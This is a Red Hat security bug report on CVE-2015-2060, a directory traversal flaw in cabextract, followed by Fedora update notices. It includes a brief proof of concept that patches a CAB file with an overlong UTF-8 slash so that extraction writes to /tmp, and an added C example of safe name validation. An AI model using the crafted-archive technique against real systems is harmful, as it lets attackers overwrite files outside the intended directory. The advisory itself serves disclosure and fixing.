Bug 1193952 (CVE-2015-2060)

Summary: CVE-2015-2060 cabextract: directory traversal with UTF-8 symbols in filenames
Product: [Other] Security Response
Reporter: Vasyl Kaigorodov <vkaigoro>
Component: vulnerability
Assignee: Red Hat Product Security <security-response-team>
Status: CLOSED ERRATA
Severity: low
Priority: low
Version: unspecified
CC: janfrode, jorti, pertusus, rdieter
Target Milestone: ---
Keywords: Security
Target Release: ---
Hardware: All
OS: Linux
Doc Type: Bug Fix
Story Points: ---
Last Closed: 2016-06-10 20:52:21 UTC
Type: ---
Regression: ---
Mount Type: ---
Documentation: ---
Category: ---
oVirt Team: ---
Cloudforms Team: ---
Bug Depends On: 1193955, 1193956

Description Vasyl Kaigorodov 2015-02-18 15:42:37 UTC
It was reported [1] that cabextract is susceptible to a directory traversal vulnerability. While extracting files from an archive, it removes leading slashes from filenames but does it before possibly decoding UTF-8 and doesn't check for invalid UTF-8. Hence an absolute filename can be shoved through by using overlong encoding for the leading slash (and setting utf8 attribute in the header). This can be exploited by a malicious archive to write files outside the current directory.

Illustration:

$ touch xxxxxxxxxx
$ lcab xxxxxxxxxx test.cab
$ sed -i 's|\x20\x00xxxxxxxxxx|\xa0\x00\xe0\x80\xaftmp/abs|g' test.cab
$ rm xxxxxxxxxx

$ ls /tmp/abs
ls: cannot access /tmp/abs: No such file or directory

$ ./cabextract test.cab
Extracting cabinet: test.cab
  extracting /tmp/abs

All done, no errors.

$ ls /tmp/abs
/tmp/abs

In the sed command above, \xe0\x80\xaf is an overlong encoding for '/', and \xa0\x00 are the flags updated to include the utf-8 flag.

The issue was found in cabextract 1.4, where a 2-byte encoding (\xc0\xaf) was enough to hide '/'. cabextract 1.5 tightened its utf-8 checks, so a 3-byte encoding is now necessary.

The issue was reported to Stuart Caie today and fixed in less than 4h:

http://sourceforge.net/p/libmspack/code/217/

Another release of cabextract is expected in the next few days.

[1]: http://seclists.org/oss-sec/2015/q1/587
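
The ordering problem described above, as an added illustration that is not cabextract's or libmspack's own code: a CAB member name must be validated as strict UTF-8 (rejecting overlong forms such as \xc0\xaf and \xe0\x80\xaf) before any leading separators are stripped or ".." components rejected, otherwise an alternate encoding of '/' survives the sanitisation step. The function names utf8_decode_strict and cab_safe_name are assumptions made for this example.

```c
#include <string.h>
#include <stdint.h>

/* Strict UTF-8 decode of one code point from s[0..n). Returns the number of
 * bytes consumed, or 0 for invalid input: stray continuation bytes, truncated
 * sequences, overlong forms (C0 AF, E0 80 AF, ...), surrogates, > U+10FFFF. */
static size_t utf8_decode_strict(const unsigned char *s, size_t n, uint32_t *cp)
{
    size_t len, i; uint32_t min;
    if (n == 0) return 0;
    if (s[0] < 0x80) { *cp = s[0]; return 1; }
    else if ((s[0] & 0xE0) == 0xC0) { len = 2; min = 0x80;    *cp = s[0] & 0x1F; }
    else if ((s[0] & 0xF0) == 0xE0) { len = 3; min = 0x800;   *cp = s[0] & 0x0F; }
    else if ((s[0] & 0xF8) == 0xF0) { len = 4; min = 0x10000; *cp = s[0] & 0x07; }
    else return 0;
    if (n < len) return 0;
    for (i = 1; i < len; i++) {
        if ((s[i] & 0xC0) != 0x80) return 0;          /* not a continuation byte */
        *cp = (*cp << 6) | (s[i] & 0x3F);
    }
    if (*cp < min || *cp > 0x10FFFF || (*cp >= 0xD800 && *cp <= 0xDFFF)) return 0;
    return len;                                        /* overlong/surrogate rejected */
}

/* Turn raw header bytes (utf8 flag set) into a relative path that is safe to
 * join with the output directory. Returns 1 on success, 0 if the name must be
 * refused. Step 1 runs before step 2 so no encoded '/' can slip past it. */
int cab_safe_name(const unsigned char *raw, size_t n, char *out, size_t outsz)
{
    size_t i, o = 0; uint32_t cp;
    /* 1. whole name must be well-formed UTF-8 with no NUL */
    for (i = 0; i < n; ) {
        size_t k = utf8_decode_strict(raw + i, n - i, &cp);
        if (k == 0 || cp == 0) return 0;
        i += k;
    }
    /* 2. split on '/' or '\', drop empty and "." parts, refuse ".." parts */
    for (i = 0; i < n; ) {
        size_t start = i, clen;
        while (i < n && raw[i] != '/' && raw[i] != '\\') i++;
        clen = i - start;
        if (i < n) i++;                                /* skip the separator */
        if (clen == 0 || (clen == 1 && raw[start] == '.')) continue;
        if (clen == 2 && raw[start] == '.' && raw[start + 1] == '.') return 0;
        if (o + clen + 2 > outsz) return 0;
        if (o) out[o++] = '/';
        memcpy(out + o, raw + start, clen); o += clen;
    }
    out[o] = '\0';
    return o > 0;                                      /* "/" alone is refused */
}
```

With this ordering the report's crafted name "\xe0\x80\xaftmp/abs" is refused outright, while "/tmp/abs" is reduced to the relative "tmp/abs".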

Comment 1 Vasyl Kaigorodov 2015-02-18 15:45:16 UTC
Created cabextract tracking bugs for this issue:

Affects: fedora-all [bug 1193955]
Affects: epel-all [bug 1193956]

Comment 2 Fedora Update System 2015-03-09 08:21:42 UTC
cabextract-1.5-1.fc21 has been pushed to the Fedora 21 stable repository.  If problems still persist, please make note of it in this bug report.

Comment 3 Fedora Update System 2015-03-09 08:21:57 UTC
cabextract-1.5-1.fc20 has been pushed to the Fedora 20 stable repository.  If problems still persist, please make note of it in this bug report.

Comment 4 Fedora Update System 2015-03-16 16:31:51 UTC
cabextract-1.5-1.el7 has been pushed to the Fedora EPEL 7 stable repository.  If problems still persist, please make note of it in this bug report.

Comment 5 Fedora Update System 2015-03-16 16:32:16 UTC
cabextract-1.5-1.el6 has been pushed to the Fedora EPEL 6 stable repository.  If problems still persist, please make note of it in this bug report.

Comment 6 Fedora Update System 2015-04-09 16:57:17 UTC
cabextract-1.5-1.el5 has been pushed to the Fedora EPEL 5 stable repository.  If problems still persist, please make note of it in this bug report.